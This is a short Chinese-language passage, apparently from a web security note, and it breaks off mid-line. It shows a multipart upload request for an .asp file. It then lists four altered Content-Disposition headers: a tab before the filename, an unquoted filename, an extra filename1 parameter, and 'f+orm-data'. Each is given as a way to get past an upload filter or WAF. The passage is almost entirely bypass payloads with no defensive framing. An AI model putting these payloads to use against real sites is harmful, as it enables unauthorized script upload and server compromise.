原始请求包:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”cesafe.asp”
Content-Type: text/html
方法1,文件名前缀加[0x09]绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”[0x09]cesafe.asp”
Content-Type: text/html
方法2,文件名去掉双引号绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=cesafe.asp
Content-Type: text/html
方法3,添加一个filename1的文件名参数,并赋值绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: form-data; name=”filepath”; filename=”cesafe.asp”;filename1=”test.jpg”
Content-Type: text/html
方法4,form变量改成f+orm组合绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D
Content-Disposition: f+orm-data; name=”filepath”;filename&